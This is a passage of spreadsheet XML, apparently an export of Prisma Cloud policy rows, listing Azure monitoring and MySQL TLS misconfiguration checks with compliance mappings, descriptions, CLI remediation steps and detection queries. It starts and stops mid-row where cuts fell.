      <c r="H23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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2308" t="inlineStr">
        <is>
          <t>azure-monitor-log</t>
        </is>
      </c>
      <c r="K2308" t="inlineStr">
        <is>
          <t>Azure Monitoring log profile is not configured to export activity logs</t>
        </is>
      </c>
      <c r="L2308" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2308" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2308" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2308" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2308" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2308" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2308" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2308" t="inlineStr"/>
      <c r="T2308" t="b">
        <v>0</v>
      </c>
      <c r="U2308" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2308" t="inlineStr">
        <is>
          <t>azure-monitor-log-profiles-list</t>
        </is>
      </c>
      <c r="W2308" t="inlineStr">
        <is>
          <t>This policy identifies the Azure accounts in which at least one monitoring log profile is not configured. A Log Profile controls how your Activity Log is exported; using which you could export the logs and store them for a longer duration for analyzing security activities within your Azure account. So it is recommended to have at least one monitoring log profile in an account to export all activity logs.</t>
        </is>
      </c>
      <c r="X2308" t="inlineStr">
        <is>
          <t>To create a new log profile (Export to a storage account) use following command:
az monitor log-profiles create --name &lt;NAME_OF_LOGPROFILE&gt; --location &lt;LOCATION&gt; --locations &lt;LOCATIONS_LIST&gt; --categories "Delete" "Write" "Action" --enabled true --days &lt;RETENTION_IN_DAYS&gt; --storage-account-id "/subscriptions/&lt;SUBSCRIPTION_ID&gt;/resourceGroups/&lt;RESOURCE_GROUPNAME&gt;/providers/Microsoft.Storage/storageAccounts/&lt;STORAGE_ACCOUNT_NAME&gt;"
OR
To create a new log profile (Export to an event hub) use following command:
az monitor log-profiles create --name &lt;NAME_OF_LOGPROFILE&gt; --location &lt;LOCATION&gt; --locations &lt;LOCATIONS_LIST&gt; --categories "Delete" "Write" "Action" --enabled true --days &lt;RETENTION_IN_DAYS&gt; --service-bus-rule-id "/subscriptions/&lt;SUBSCRIPTION_ID&gt;/resourceGroups/&lt;RESOURCE_GROUPNAME&gt;/providers/Microsoft.EventHub/namespaces/&lt;EVENTHUB_NAMESPACENAME&gt;/authorizationrules/RootManageSharedAccessKey"
NOTE: Make sure before referring Storage Account or Eventhub in above CLI commands, you have already created Storage Account or Eventhub as per your requirements.</t>
        </is>
      </c>
      <c r="Y2308" t="inlineStr"/>
      <c r="Z2308" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-monitor-log-profiles-list' as X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2308" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2308" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2308" t="inlineStr">
        <is>
          <t>PC-AZR-MON-528</t>
        </is>
      </c>
      <c r="AD2308" t="b">
        <v>1</v>
      </c>
      <c r="AE2308" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2308" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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8" t="inlineStr">
        <is>
          <t>ebdba5a4-af9e-4015-a024-e8eb650e3be3</t>
        </is>
      </c>
      <c r="AI2308" t="inlineStr">
        <is>
          <t>ac5c8332-e33c-4118-b982-6173a4b92781</t>
        </is>
      </c>
      <c r="AJ2308" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2308" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2309">
      <c r="A2309" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, RBI Baseline Cyber Security and Resilience Requirements, CRI Profile v2.0, jneytchev-fedramp-low, Sarbanes Oxley Act (SOX), APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), kfirdaus AWS Account-CS, NIST CSF v2.0, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), ISO 27002:2022, Fedramp (Moderate), ISO/IEC 27002:2013, ITSG-33, Secure Controls Framework (SCF) - 2024.2, NIST SP 800-171 Revision 3, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, TX-RAMP Level 1, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), PCI DSS v3.2.1, CIS Controls v8, CSA CCM v.4.0.1, Copy of ACSC Information Security Manual (ISM)-clone, GDPR, ISO/IEC 27017:2015, CDC NIST 800-53 Rev4, kfirdaus AWS Account-CS, CIS Controls v7.1, ISO/IEC 27001:2022, CyberSecurity Law of the People's Republic of China, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, APRA (CPS 234) Information Security, TX-RAMP Level 1, Telecommunications Security Act - TSA, NIST 800-53 Rev 5, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, CSA CCM v.4.0.6, TX-RAMP Level 1, NIST SP 800-171 Revision 2, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CDC NIST 800-53 Rev4, NIST SP 800-172, Copy of CIS Controls v8, TX-RAMP Level 2, CSA CCM v4.0.12, CIS v1.1 (Azure), NIST CSF v2.0, Fedramp (Moderate), Copy of ACSC Information Security Manual (ISM)-clone, NIST 800-53 Rev 5, NIST 800-53 Rev 5, HITRUST v.9.4.2 [Deprecated], CSA CCM v4.0.12, NIST 800-53 Rev4, RBI Baseline Cyber Security and Resilience Requirements, kashan ACSC Information Security Manual (ISM), Fedramp (Low), Copy of CIS Controls v8, CyberSecurity Law of the People's Republic of China, Fedramp (Low), CSA CCM v.4.0.1, CIS Controls v8, jneytchev-fedramp-low, FFIEC, CSA CCM v.4.0.1, CIS Controls v8.1, CRI Profile v2.0, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, ACSC Information Security Manual (ISM), NIST 800-53 Rev4, CRI Profile v1.2.1, CRI Profile v2.0, ISO 27002:2022, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, CIS Controls v7.1, ISO/IEC 27002:2013, SOC 2, NIST CSF v2.0, APRA (CPS 234) Information Security, HIPAA, kfirdaus AWS Account-CS, NIST CSF, CDC NIST 800-53 Rev4, kashan ACSC Information Security Manual (ISM), TX-RAMP Level 2, Fedramp (Moderate), CRI Profile v1.2.1, CSA CCM v.4.0.6, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, FFIEC, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, testazure, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.6, CIS Controls v8.1, CSA CCM v4.0.12, CSA CCM v.4.0.6, Matt's ATT&amp;ACK, ISO/IEC 27001:2022, DORA, Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v3.2.1, TX-RAMP Level 2, NIST 800-53 Rev4</t>
        </is>
      </c>
      <c r="B2309" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2309" s="2" t="inlineStr"/>
      <c r="D2309" t="inlineStr"/>
      <c r="E2309" t="inlineStr"/>
      <c r="F2309" t="inlineStr"/>
      <c r="G2309" t="b">
        <v>1</v>
      </c>
      <c r="H23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09" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2309" t="inlineStr">
        <is>
          <t>azure-monitor-log</t>
        </is>
      </c>
      <c r="K2309" t="inlineStr">
        <is>
          <t>Azure Monitor log profile does not capture all activities</t>
        </is>
      </c>
      <c r="L2309" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2309" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2309" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2309" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2309" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2309" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2309" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2309" t="inlineStr"/>
      <c r="T2309" t="b">
        <v>0</v>
      </c>
      <c r="U2309" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2309" t="inlineStr">
        <is>
          <t>azure-monitor-log-profiles-list</t>
        </is>
      </c>
      <c r="W2309" t="inlineStr">
        <is>
          <t>This policy identifies the Monitor log profiles which are not configured to capture all activities. A log profile controls how the activity log is exported. Configuring the log profile to collect logs for the categories 'Write', 'Delete' and 'Action' ensures that all the control/management plane activities performed on the subscription are exported.</t>
        </is>
      </c>
      <c r="X2309" t="inlineStr">
        <is>
          <t>On the Azure Portal, there is no provision to check or set categories. However, when a log profile is created using the Azure Portal, Write, Delete and Action categories are set by default.
Log profile activities can be set only through CLI using REST API and CLI is:
1. To list the Log profile run,
az monitor log-profiles list
2. Note the name of reported log profile and replace it with &lt;LOG_PROFILE_NAME&gt; in below command:
az account get-access-token --query "{subscription:subscription,accessToken:accessToken}" --out tsv | xargs -L1 bash -c 'curl -X GET -H "Authorization: Bearer $1" -H "Content-Type: application/json" https://management.azure.com/subscriptions/$0/providers/microsoft.insights/logprofiles/&lt;LOG_PROFILE_NAME&gt;?api-version=2016-03-01' | jq
Copy the JSON output and save it as 'input.json' file.
3. Edit the saved 'input.json' file to add all activities 'Write', 'Delete' and 'Action' in categories JSON array section.
4. Run below command taking 'input.json' as input file,
az account get-access-token --query "{subscription:subscription,accessToken:accessToken}" --out tsv | xargs -L1 bash -c 'curl -X PUT -H "Authorization: Bearer $1" -H "Content-Type: application/json" https://management.azure.com/subscriptions/$0/providers/microsoft.insights/logprofiles/&lt;LOG_PROFILE_NAME&gt;?api-version=2016-03-01 -d@"input.json"'
NOTE: To run all above CLIs you have to be configured with Azure subscription and accessToken locally. And these CLI commands require 'microsoft.insights/logprofiles/*' permission. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-logging-policies/ensure-audit-profile-captures-all-activities
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-logging-policies/ensure-audit-profile-captures-all-activities</t>
        </is>
      </c>
      <c r="Y2309" t="inlineStr"/>
      <c r="Z2309" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-monitor-log-profiles-list' AND json.rule = 'isLegacy is true and (properties.categories[*] does not contain Write or properties.categories[*] does not contain Delete or properties.categories[*] does not contain Action)'
{"category":"Logging","resourceTypes":["azurerm_monitor_log_profile"]}</t>
        </is>
      </c>
      <c r="AA2309" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2309" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2309" t="inlineStr">
        <is>
          <t>PC-AZR-MON-524-CKV_AZURE_38</t>
        </is>
      </c>
      <c r="AD2309" t="b">
        <v>1</v>
      </c>
      <c r="AE2309" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2309" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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09" t="inlineStr">
        <is>
          <t>64f0ec41-cdcb-42e4-b556-eb66946a62ff</t>
        </is>
      </c>
      <c r="AI2309" t="inlineStr">
        <is>
          <t>03a90ea7-d8f5-4761-beb7-ffcc24237741</t>
        </is>
      </c>
      <c r="AJ2309" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2309" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2310">
      <c r="A2310" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, RBI Baseline Cyber Security and Resilience Requirements, CRI Profile v2.0, Sarbanes Oxley Act (SOX), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CDC NIST 800-53 Rev4, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), PCI DSS v4.0, NIST CSF v2.0, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), Telecommunications Security Act - TSA, ISO 27002:2022, Australian Energy Sector Cyber Security Framework (AESCSF), PCI DSS v3.2.1, ISO/IEC 27002:2013, ITSG-33, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, PCI DSS v4.0, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, New Zealand Information Security Manual (NZISM v3.4), CIS Controls v8, CSA CCM v.4.0.1, ISO/IEC 27017:2015, CIS Controls v8.1, kfirdaus AWS Account-CS, CIS Controls v7.1, ISO/IEC 27001:2022, CyberSecurity Law of the People's Republic of China, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Telecommunications Security Act - TSA, CIS v1.1 (Azure), Telecommunications Security Act - TSA, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), PCI DSS v4.0, ISO 27002:2022, CSA CCM v.4.0.6, TX-RAMP Level 1, NIST SP 800-171 Revision 2, Secure Controls Framework (SCF) - 2022.2.1, NIST 800-53 Rev 5, Copy of CIS Controls v8, PCI DSS v4.0, TX-RAMP Level 1, TX-RAMP Level 2, CSA CCM v4.0.12, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, HITRUST CSF v.11.2.0, Copy of CIS Controls v8, CyberSecurity Law of the People's Republic of China, CSA CCM v.4.0.1, PCI DSS v4.0, PCI DSS v4.0, ISO/IEC 27001:2022, CIS Controls v8, FFIEC, CSA CCM v.4.0.1, CIS Controls v8.1, CRI Profile v2.0, PCI DSS v4.0, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CRI Profile v1.2.1, testazure, NIST 800-53 Rev4, ISO 27002:2022, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, Copy of New Zealand Information Security Manual (NZISM v3.4), CIS Controls v7.1, ISO/IEC 27002:2013, PCI DSS v4.0, SOC 2, ITSG-33, APRA (CPS 234) Information Security, HIPAA, kfirdaus AWS Account-CS, Fedramp (Moderate), NIST CSF, GDPR, kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, PCI DSS v4.0, CRI Profile v1.2.1, CSA CCM v.4.0.6, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, FFIEC, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.6, CIS Controls v8.1, CSA CCM v4.0.12, CSA CCM v.4.0.6, Matt's ATT&amp;ACK, ISO/IEC 27001:2022, DORA, Copy of ACSC Information Security Manual (ISM)-clone, TX-RAMP Level 2, PCI DSS v4.0, NIST SP 800-172, Australian Energy Sector Cyber Security Framework (AESCSF), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2)</t>
        </is>
      </c>
      <c r="B2310" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2310" s="2" t="inlineStr"/>
      <c r="D2310" t="inlineStr"/>
      <c r="E2310" t="inlineStr"/>
      <c r="F2310" t="inlineStr"/>
      <c r="G2310" t="b">
        <v>0</v>
      </c>
      <c r="H23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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2310" t="inlineStr">
        <is>
          <t>azure-monitor-log</t>
        </is>
      </c>
      <c r="K2310" t="inlineStr">
        <is>
          <t>Azure log profile not capturing activity logs for all regions</t>
        </is>
      </c>
      <c r="L2310" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2310" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2310" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2310" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2310" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2310" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2310" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2310" t="inlineStr"/>
      <c r="T2310" t="b">
        <v>0</v>
      </c>
      <c r="U2310" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2310" t="inlineStr">
        <is>
          <t>azure-monitor-log-profiles-list</t>
        </is>
      </c>
      <c r="W2310" t="inlineStr">
        <is>
          <t>This policy identifies Azure log profiles that are not capturing activity logs for all regions. Activity logs are exported from all the Azure supported regions/locations means that logs for potentially unexpected activities occurring in otherwise unused regions are stored and made available for incident response and investigations.
Note: Since this type of logging is not deprecated from the Cloud service provider yet, we support it until it is removed.</t>
        </is>
      </c>
      <c r="X2310" t="inlineStr">
        <is>
          <t>1. Execute the command to check the number of regions present on the account: az account list-locations --query '[*].name' | grep -P 'w+' | wc -l
2. Execute the command to check the number of regions added to the log profile: az monitor log-profiles list --query '[*].locations' | grep -P 'w+' | wc -l
3. In case there is a difference in the count of regions from step 1 and step 2, Execute the command to list all regions az account list-locations --query '[*].name'
4. Use the listed regions from step 3 and Update the Legacy Log profiles activity logs for all regions by following the below URL:
https://learn.microsoft.com/en-us/azure/azure-monitor/essentials/activity-log?tabs=cli#managing-legacy-log-profiles</t>
        </is>
      </c>
      <c r="Y2310" t="inlineStr"/>
      <c r="Z2310" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-monitor-log-profiles-list' AND json.rule = 'isLegacy is true and properties.isCapturingLogsForAllRegions is false'</t>
        </is>
      </c>
      <c r="AA2310" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2310" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2310" t="inlineStr">
        <is>
          <t>PC-AZR-MON-515</t>
        </is>
      </c>
      <c r="AD2310" t="b">
        <v>1</v>
      </c>
      <c r="AE2310" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2310" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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0" t="inlineStr">
        <is>
          <t>19b8122e-b75e-4899-8619-92628ee6b539</t>
        </is>
      </c>
      <c r="AI2310" t="inlineStr">
        <is>
          <t>1c013801-0035-4b41-9d5d-8b21f41093d6</t>
        </is>
      </c>
      <c r="AJ2310" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2310" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2311">
      <c r="A2311" t="inlineStr">
        <is>
          <t>Azure Security Benchmark (v3), RBI Baseline Cyber Security and Resilience Requirements, CRI Profile v2.0, Sarbanes Oxley Act (SOX), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MLPS 2.0 (Level 2), PCI DSS v4.0, kfirdaus AWS Account-CS, NIST CSF v2.0, MLPS 2.0 (Level 2), ISO 27002:2022, Azure Security Benchmark (v2), Copy of Azure Security Benchmark (v3), ITSG-33, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, PCI DSS v4.0, CIS v1.3.1 (Azure), CIS v1.4.0 (Azure), TX-RAMP Level 1, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone, GDPR, CIS v1.5.0 (Azure) - Level 1, MTSBv2_Azure, CIS Controls v7.1, ISO/IEC 27001:2022, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS v1.3.0 (Azure), TX-RAMP Level 1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), PCI DSS v4.0, New Zealand Information Security Manual (NZISM v3.4), ISO 27002:2022, CSA CCM v.4.0.6, TX-RAMP Level 1, Secure Controls Framework (SCF) - 2022.2.1, Copy of CIS Controls v8, PCI DSS v4.0, TX-RAMP Level 2, CSA CCM v4.0.12, NIST CSF v2.0, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, Azure Security Benchmark (v3), Copy of Azure Security Benchmark (v3), kashan ACSC Information Security Manual (ISM), Copy of CIS Controls v8, Azure Security Benchmark (v3), PCI DSS v4.0, PCI DSS v4.0, CIS Controls v8, FFIEC, CIS Controls v8.1, CRI Profile v2.0, PCI DSS v4.0, Insurance Regulatory And Development Authority Of India, ACSC Information Security Manual (ISM), CRI Profile v1.2.1, ISO 27002:2022, kashan ACSC Information Security Manual (ISM), CIS v2.1.0 (Azure) Level 1, CIS Controls v7.1, PCI DSS v4.0, SOC 2, kfirdaus AWS Account-CS, TX-RAMP Level 2, PCI DSS v4.0, PCI DSS v4.0, CRI Profile v1.2.1, CSA CCM v.4.0.6, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), FFIEC, CSA CCM v.4.0.6, CIS Controls v8.1, CSA CCM v4.0.12, CIS v2.0.0 (Azure) Level 1, CSA CCM v.4.0.6, ISO/IEC 27001:2022, Copy of Azure Security Benchmark (v3), DORA, Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v4.0, TX-RAMP Level 2, Copy of New Zealand Information Security Manual (NZISM v3.4), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2)</t>
        </is>
      </c>
      <c r="B2311" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2311" s="2" t="inlineStr"/>
      <c r="D2311" t="inlineStr"/>
      <c r="E2311" t="inlineStr"/>
      <c r="F2311" t="inlineStr"/>
      <c r="G2311" t="b">
        <v>0</v>
      </c>
      <c r="H23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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2311" t="inlineStr">
        <is>
          <t>azure-monitor-log</t>
        </is>
      </c>
      <c r="K2311" t="inlineStr">
        <is>
          <t>Azure Monitor Diagnostic Setting does not captures appropriate categories</t>
        </is>
      </c>
      <c r="L2311" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2311" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2311" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2311" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2311" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2311" t="inlineStr">
        <is>
          <t>10</t>
        </is>
      </c>
      <c r="R2311" t="inlineStr">
        <is>
          <t>10.8</t>
        </is>
      </c>
      <c r="S2311" t="inlineStr"/>
      <c r="T2311" t="b">
        <v>0</v>
      </c>
      <c r="U2311" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2311" t="inlineStr">
        <is>
          <t>azure-monitor-log-profiles-list</t>
        </is>
      </c>
      <c r="W2311" t="inlineStr">
        <is>
          <t>This policy identifies Azure Monitor Diagnostic Setting which does not captures appropriate categories. Capturing appropriate diagnostic setting categories allows proper alerting. It is recommended to select Administrative, Alert, Policy, and Security diagnostic setting categories.</t>
        </is>
      </c>
      <c r="X2311" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Navigate to 'Monitor' and select 'Activity log'
3. Click on 'Diagnostic settings' in top pane
4. Select 'Add diagnostic setting' if no 'Diagnostic settings' present
OR
Click on 'Edit setting' for the existing 'Diagnostic settings'
5. Under 'Category details', select 'Administrative', 'Alert', 'Policy', and 'Security' for 'log'
6. Add 'Destination details' and other required fields
7. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2311" t="inlineStr"/>
      <c r="Z2311" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-monitor-log-profiles-list' AND json.rule = properties.logs[?any((enabled is true and category equals Administrative))] exists and properties.logs[?any((enabled is true and category equals Alert))] exists and properties.logs[?any((enabled is true and category equals Policy))] exists and properties.logs[?any((enabled is true and category equals Security))] exists as X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2311" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2311" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2311" t="inlineStr">
        <is>
          <t>PC-AZR-MON-713</t>
        </is>
      </c>
      <c r="AD2311" t="b">
        <v>1</v>
      </c>
      <c r="AE2311" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2311" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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1" t="inlineStr">
        <is>
          <t>86d9615f-9e09-4ae5-a9fa-edb6927a8eec</t>
        </is>
      </c>
      <c r="AI2311" t="inlineStr">
        <is>
          <t>2508f3cf-7311-44d8-9b07-1dffa475b54f</t>
        </is>
      </c>
      <c r="AJ2311" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2311" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2312">
      <c r="A2312" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, ISO/IEC 27001:2022, CIS v1.5.0 (Azure) - Level 1, Secure Controls Framework (SCF) - 2024.2, CIS v2.0.0 (Azure) Level 1, CIS v1.4.0 (Azure), Microsoft Cloud Security Benchmark v1, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2022.2.1, CIS Controls v8.1, CIS v2.1.0 (Azure) Level 1, Microsoft Cloud Security Benchmark v1, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2312" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2312" s="2" t="inlineStr"/>
      <c r="D2312" t="inlineStr"/>
      <c r="E2312" t="inlineStr"/>
      <c r="F2312" t="inlineStr"/>
      <c r="G2312" t="b">
        <v>1</v>
      </c>
      <c r="H23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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2312" t="inlineStr">
        <is>
          <t>azure-mysql-flexible</t>
        </is>
      </c>
      <c r="K2312" t="inlineStr">
        <is>
          <t>Azure MySQL database flexible server using insecure TLS version</t>
        </is>
      </c>
      <c r="L2312" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2312" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2312" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2312" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2312" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2312" t="inlineStr">
        <is>
          <t>NS</t>
        </is>
      </c>
      <c r="R2312" t="inlineStr">
        <is>
          <t>NS-2</t>
        </is>
      </c>
      <c r="S2312" t="inlineStr"/>
      <c r="T2312" t="b">
        <v>0</v>
      </c>
      <c r="U2312" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2312" t="inlineStr">
        <is>
          <t>azure-mysql-flexible-server</t>
        </is>
      </c>
      <c r="W2312" t="inlineStr">
        <is>
          <t>This policy identifies Azure MySQL database flexible servers which are using insecure TLS version. Enforcing TLS connections between database server and client applications helps protect against 'man in the middle' attacks by encrypting the data stream between the server and application. As a security best practice, it is recommended to use the latest TLS version for Azure MySQL database flexible server.</t>
        </is>
      </c>
      <c r="X2312" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Go to Azure Database for MySQL flexible servers dashboard
3. Click on the reported MySQL flexible server
4. Click on 'Server parameters' under 'Settings'
5. In the search box, type in 'require_secure_transport' and make sure VALUE is set to 'ON' if it is not already set.
6. In the search box, type in 'tls_version' and Set VALUE to TLSV1.2 or above for tls_version.</t>
        </is>
      </c>
      <c r="Y2312" t="inlineStr"/>
      <c r="Z2312" t="inlineStr">
        <is>
